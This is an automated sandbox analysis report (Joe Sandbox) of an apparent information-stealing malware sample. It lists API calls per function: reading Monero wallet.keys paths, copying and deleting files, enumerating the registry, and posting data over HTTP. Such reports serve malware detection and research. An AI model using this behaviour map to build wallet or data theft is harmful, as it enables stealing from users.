GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0089AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0089AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0089ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089A8B0

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

lstrcat.KERNEL32(?,00000000), ref: 0089ACEB
lstrcat.KERNEL32(?,008B1320), ref: 0089ACFA
lstrcat.KERNEL32(?,00000000), ref: 0089AD0D
lstrcat.KERNEL32(?,008B1324), ref: 0089AD1C
lstrcat.KERNEL32(?,00000000), ref: 0089AD2F
lstrcat.KERNEL32(?,008B1328), ref: 0089AD3E
lstrcat.KERNEL32(?,00000000), ref: 0089AD51
lstrcat.KERNEL32(?,008B132C), ref: 0089AD60
lstrcat.KERNEL32(?,00000000), ref: 0089AD73
lstrcat.KERNEL32(?,008B1330), ref: 0089AD82
lstrcat.KERNEL32(?,00000000), ref: 0089AD95
lstrcat.KERNEL32(?,008B1334), ref: 0089ADA4
lstrcat.KERNEL32(?,00000000), ref: 0089ADB7
lstrlen.KERNEL32(?), ref: 0089AE0D
lstrlen.KERNEL32(?), ref: 0089AE1C

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

DeleteFileA.KERNEL32(00000000), ref: 0089AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0089ABD4

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: e5c7d99e8dd15fe49e5efdd2122c70db7b8fdb1d345f699fc8962e76ba520cc3
Instruction ID: a1244638edce2c60786fadc3e189658fb93d90b2d4a765bc7e19f872b90ae0f7
Opcode Fuzzy Hash: e5c7d99e8dd15fe49e5efdd2122c70db7b8fdb1d345f699fc8962e76ba520cc3
Instruction Fuzzy Hash: 311231719101089BDB48FBA4DD96EEE7378FF15300F544069B503E6991EF386A0ACBA3

Function 00895960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008959F8
StrCmpCA.SHLWAPI(?,0156E4F0), ref: 00895A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00895B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0156E5B0,00000000,?,01569F18,00000000,?,008B1A1C), ref: 00895E71
lstrlen.KERNEL32(00000000), ref: 00895E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00895E93
RtlAllocateHeap.NTDLL(00000000), ref: 00895E9A
lstrlen.KERNEL32(00000000), ref: 00895EAF
lstrlen.KERNEL32(00000000), ref: 00895ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00895EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00895F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00895F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00895F4C
InternetCloseHandle.WININET(00000000), ref: 00895FB0
InternetCloseHandle.WININET(00000000), ref: 00895FBD
HttpOpenRequestA.WININET(00000000,0156E510,?,0156DC98,00000000,00000000,00400100,00000000), ref: 00895BF8

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

InternetCloseHandle.WININET(00000000), ref: 00895FC7

Strings

", xrefs: 00895E16
------, xrefs: 00895D4C
------, xrefs: 00895A96
", xrefs: 00895CD5
------, xrefs: 00895C0B

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: be92c57b806f77ded06bd071680c1ed878e00245893891abff14dad858211a5f
Instruction ID: b083e1d69013bb110dc02d30addd5388d147322563190bcd6dbfe6a963c5cdc7
Opcode Fuzzy Hash: be92c57b806f77ded06bd071680c1ed878e00245893891abff14dad858211a5f
Instruction Fuzzy Hash: 37122271820118ABEB59EBA4DC95FEEB378FF15700F444169B107E2991EF342A4ACF52

Function 0089CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0156A038,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0089D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0089D0CE
lstrcat.KERNEL32(?,00000000), ref: 0089D208
lstrcat.KERNEL32(?,008B1478), ref: 0089D217
lstrcat.KERNEL32(?,00000000), ref: 0089D22A
lstrcat.KERNEL32(?,008B147C), ref: 0089D239
lstrcat.KERNEL32(?,00000000), ref: 0089D24C
lstrcat.KERNEL32(?,008B1480), ref: 0089D25B
lstrcat.KERNEL32(?,00000000), ref: 0089D26E
lstrcat.KERNEL32(?,008B1484), ref: 0089D27D
lstrcat.KERNEL32(?,00000000), ref: 0089D290
lstrcat.KERNEL32(?,008B1488), ref: 0089D29F
lstrcat.KERNEL32(?,00000000), ref: 0089D2B2
lstrcat.KERNEL32(?,008B148C), ref: 0089D2C1
lstrcat.KERNEL32(?,00000000), ref: 0089D2D4
lstrcat.KERNEL32(?,008B1490), ref: 0089D2E3

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

lstrlen.KERNEL32(?), ref: 0089D32A
lstrlen.KERNEL32(?), ref: 0089D339

Part of subcall function 008AAA70: StrCmpCA.SHLWAPI(015689E0,0089A7A7,?,0089A7A7,015689E0), ref: 008AAA8F

DeleteFileA.KERNEL32(00000000), ref: 0089D3B4

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: b4fbcca9850543ac28e8a292907f56ad6ad73c16ebfc024d9f014f8c7362e386
Instruction ID: 87301c0be9cc335fae450b071fef690b43ae5f53d88049bf2993227ca8500c38
Opcode Fuzzy Hash: b4fbcca9850543ac28e8a292907f56ad6ad73c16ebfc024d9f014f8c7362e386
Instruction Fuzzy Hash: 23E13D71910108ABDB48EBA4DD96EEE7378FF15301F104169F507E6991DF38AA06CB63

Function 008A8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

RegOpenKeyExA.KERNEL32(00000000,0156AA80,00000000,00020019,00000000,008B05B6), ref: 008A83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008A8426
wsprintfA.USER32 ref: 008A8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008A847B
RegCloseKey.ADVAPI32(00000000), ref: 008A848C
RegCloseKey.ADVAPI32(00000000), ref: 008A8499

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Strings

%s\%s, xrefs: 008A844D
- , xrefs: 008A85A3
?, xrefs: 008A837A

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 03797cf5f96df8fce6fe939d2886cf30c42794843d36c51701963719945da009
Instruction ID: 4bc95bb88d2b1787926f0f6c7a08d90fd9186c66ed970cbf976fcbd7807387da
Opcode Fuzzy Hash: 03797cf5f96df8fce6fe939d2886cf30c42794843d36c51701963719945da009
Instruction Fuzzy Hash: C7811C71911118AFEB68DB54CC95FEAB7B8FF18700F008299E10AE6540DF756B86CFA1

Function 00896280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

InternetOpenA.WININET(008B0DFE,00000001,00000000,00000000,00000000), ref: 008962E1
StrCmpCA.SHLWAPI(?,0156E4F0), ref: 00896303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00896335
HttpOpenRequestA.WININET(00000000,GET,?,0156DC98,00000000,00000000,00400100,00000000), ref: 00896385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008963BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008963D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008963FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0089646D
InternetCloseHandle.WININET(00000000), ref: 008964EF
InternetCloseHandle.WININET(00000000), ref: 008964F9
InternetCloseHandle.WININET(00000000), ref: 00896503

Strings

ERROR, xrefs: 00896407
GET, xrefs: 0089637C
ERROR, xrefs: 008964C9

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 185c8fe73346ba73f310e3a67d82c92af449b1c2558ee91c08b8b04823836c0b
Instruction ID: faed8fa9d313023f36122a82ed3bc2a125b2734f4aa14519e12d717a39a76b32
Opcode Fuzzy Hash: 185c8fe73346ba73f310e3a67d82c92af449b1c2558ee91c08b8b04823836c0b
Instruction Fuzzy Hash: A1715E71A00218ABEF14EFE4DC49BEE7774FB44700F108159F50AAB690EBB46A85CF52

Function 008A5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5857

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008A51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5228

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5318
Part of subcall function 008A52C0: lstrlen.KERNEL32(00000000), ref: 008A532F
Part of subcall function 008A52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008A5364
Part of subcall function 008A52C0: lstrlen.KERNEL32(00000000), ref: 008A5383
Part of subcall function 008A52C0: lstrlen.KERNEL32(00000000), ref: 008A53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5A0C
Sleep.KERNEL32(0000EA60), ref: 008A5A1B

Strings

ERROR, xrefs: 008A59FE
ERROR, xrefs: 008A5849
ERROR, xrefs: 008A5932
ERROR, xrefs: 008A577D
ERROR, xrefs: 008A5636
ERROR, xrefs: 008A5693

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
